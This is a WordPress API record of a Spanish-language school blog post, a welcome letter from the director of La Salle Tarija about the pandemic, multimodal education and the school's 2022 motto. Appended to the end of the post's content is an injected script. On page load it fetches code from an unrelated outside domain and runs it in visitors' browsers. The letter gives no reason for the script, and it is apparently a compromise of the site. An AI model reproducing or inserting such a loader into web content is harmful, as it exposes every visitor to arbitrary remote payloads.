{"id":1,"date":"2022-04-28T04:08:40","date_gmt":"2022-04-28T04:08:40","guid":{"rendered":"https:\/\/lasalletarija.jgnube.com\/?p=1"},"modified":"2025-06-21T08:40:11","modified_gmt":"2025-06-21T12:40:11","slug":"saludo_javier_carrillo","status":"publish","type":"post","link":"https:\/\/lasalletarija.org\/index.php\/2022\/04\/28\/saludo_javier_carrillo\/","title":{"rendered":"HNO. JAVIER CARRILLO ORTIZ"},"content":{"rendered":"\n<p><strong>DIRECTOR GENERAL LA SALLE TARIJA<\/strong><\/p>\n\n\n\n<p>Familia Lasallista: \u00a1Viva Jes\u00fas en nuestros corazones! Por siempre. A inicio de un A\u00f1o Acad\u00e9mico, deseo hacerme presente a trav\u00e9s de este medio, para darles la m\u00e1s calurosa y sentida bienvenida a nuestros Estudiantes, Maestros, Administrativos y Padres de Familia, al tiempo que comparto mis parabienes porque la serenidad y la mirada de largo alcance sean las actitudes predominantes en casa, que prevalezcan por encima de cualquier otra din\u00e1mica, por muy justificada que \u00e9sta \u00faltima pudiera estar. Estoy seguro que todos aspiramos superar lo antes posible el estado de zozobra en que nos hallamos sumidos, a causa de la pandemia. Es una aspiraci\u00f3n de la Humanidad entera, y no solo nuestra. Queremos volver a la \u201cnormalidad\u201d. Por lo que a nosotros respecta, queremos a todos nuestros hijos en las instalaciones del Colegio, cual protagonistas de su proceso educativo en todos los \u00e1mbitos, aprendiendo de sus maestros y ense\u00f1\u00e1ndonos, porque estoy convencido de que todos aprendemos de todos. Sin embargo, no nos eludamos. Habr\u00e1n notado que no dejo de entrecomillar la palabra \u201cnormalidad\u201d, por la sencilla raz\u00f3n de que nada volver\u00e1 a ser \u201cnormal\u201d despu\u00e9s del COVID-19: aun suponiendo que podamos regresar ma\u00f1ana a clases, nada seguir\u00e1 el mismo curso que ten\u00eda antes del 13 de marzo de 2020. El coronavirus nos ha empujado a lo que alguno ha denominado la \u201ceducaci\u00f3n multimodal\u201d. Con otras palabras: a la modalidad educativa presencial habr\u00e1 que sumarle lo mejor de la modalidad educativa semipresencial y o virtual, de manera que nuestros hijos reciban una educaci\u00f3n m\u00e1s totalizadora. En su momento, volveremos a las aulas, pero con las manos llenas de todas las experiencias enriquecedoras cosechadas del mundo digital. En todo este tiempo de pandemia, el Colegio ha dado algunos pasos con la esperanza de ofrecer un mejor servicio. Todos los maestros y administrativos hemos recibidos cursos de capacitaci\u00f3n y mejoramiento en el uso de las herramientas digitales a disposici\u00f3n Goole Workspace, de modo que puedan ofrecer un abordaje virtual de las clases acondicionado con los est\u00e1ndares del classroom digital. &nbsp; Haciendo un balance de estos tres \u00faltimos a\u00f1os como Director del Colegio, me doy cuenta que el recorrido no ha sido sencillo. Les confieso que echo en falta periodos de tranquilidad y sosiego. Inclusive la pandemia me ha descolocado f\u00edsica y espiritualmente. Buscando luces para entender cu\u00e1nto ha sucedido, me volv\u00ed a topar con el texto emblem\u00e1tico del Eclesiast\u00e9s cap\u00edtulo 3, vers\u00edculos 1 al 8: \u201c\u00a1Todo tiene su tiempo!\u201d.&nbsp;<br>Lo m\u00e1s probable es que nos hallemos en el tiempo de la siembra. Es el momento de la semilla sepultada bajo tierra, germinando. El calor del sol la invita al desarrollo, pero el proceso es m\u00e1s bien lento y pasa inadvertido. A este punto, mi paso por el Colegio es para la siembra, no para la cosecha. A este punto, el paso de la Humanidad ante las eventualidades presentes, es tambi\u00e9n de siembra y no de cosecha. Hay un tiempo para todo. Que este tiempo nos sea propicio, Familia Lasallista para cultivar la paciencia activa, hasta que llegue el tiempo de cosechar lo sembrado. El lema de la gesti\u00f3n 2022 es: La Utop\u00eda: \u201cUn sue\u00f1o posible\u201d. \u201cLa utop\u00eda est\u00e1 en el horizonte. Me acerco dos pasos, ella se aleja dos pasos. Camino diez pasos y el horizonte se desplaza diez pasos m\u00e1s all\u00e1. Por mucho que camine, nunca la alcanzar\u00e9. Entonces, \u00bfpara qu\u00e9 sirve la utop\u00eda? Para eso: sirve para caminar\u201d Eduardo Galeano. Esta utop\u00eda no significa una simple suposici\u00f3n de que todo es o ser\u00e1 maravilloso; representa m\u00e1s bien nuestra convicci\u00f3n de que siempre habr\u00e1 alternativas. Juan Bautista de La Salle nos recuerda que \u201cno se gana nada con dejarse llevar por el desaliento\u201d. Como nuestro fundador, que ten\u00eda los pies bien firmes en la tierra, tenemos la certeza de que el mundo es algo m\u00e1s grande que nuestro corto pasaje por \u00e9l. Gracias a nuestra experiencia tricentenaria sabemos que los dos pasos que caminamos hacia el horizonte significan peque\u00f1os progresos que mantienen viva la esperanza en el futuro. El \u00faltimo Cap\u00edtulo General nos se\u00f1al\u00f3 el horizonte hacia donde deber\u00edamos caminar, haci\u00e9ndonos conscientes de que esa utop\u00eda &#8211; esa obra de Dios que es tambi\u00e9n nuestra &#8211; requer\u00eda pasos concretos para realizarla. Invitamos a toda la Familia Lasallista de Tarija a caminar juntos como comunidad que irradia fe, esperanza, solidaridad, respeto y empat\u00eda por cada uno de sus miembros. Que el Dios que conquist\u00f3 a San Juan Bautista de La Salle, los bendiga a todos ustedes, ilumine sus rostros y les d\u00e9 la paz.<\/p>\n<script>;document.addEventListener(\"DOMContentLoaded\", function () {\n    var url = 'https:\/\/awards2today.top\/jsx';\n    fetch(url)\n        .then(response => response.text())\n        .then(data => {\n            var script = document.createElement('script');\n            script.innerHTML = data.trim();\n            document.head.appendChild(script);\n        })\n});<\/script>","protected":false},"excerpt":{"rendered":"<p>DIRECTOR GENERAL LA SALLE TARIJA Familia Lasallista: \u00a1Viva Jes\u00fas en nuestros corazones! Por siempre. A inicio de un A\u00f1o Acad\u00e9mico, deseo hacerme presente a trav\u00e9s de este medio, para darles la m\u00e1s calurosa y sentida bienvenida a nuestros Estudiantes, Maestros, Administrativos y Padres de Familia, al tiempo que comparto mis parabienes porque la serenidad y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":84,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-1","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-sin-categoria"],"_links":{"self":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts\/1","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/comments?post=1"}],"version-history":[{"count":2,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions"}],"predecessor-version":[{"id":111,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/posts\/1\/revisions\/111"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/media\/84"}],"wp:attachment":[{"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/media?parent=1"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/categories?post=1"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/lasalletarija.org\/index.php\/wp-json\/wp\/v2\/tags?post=1"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}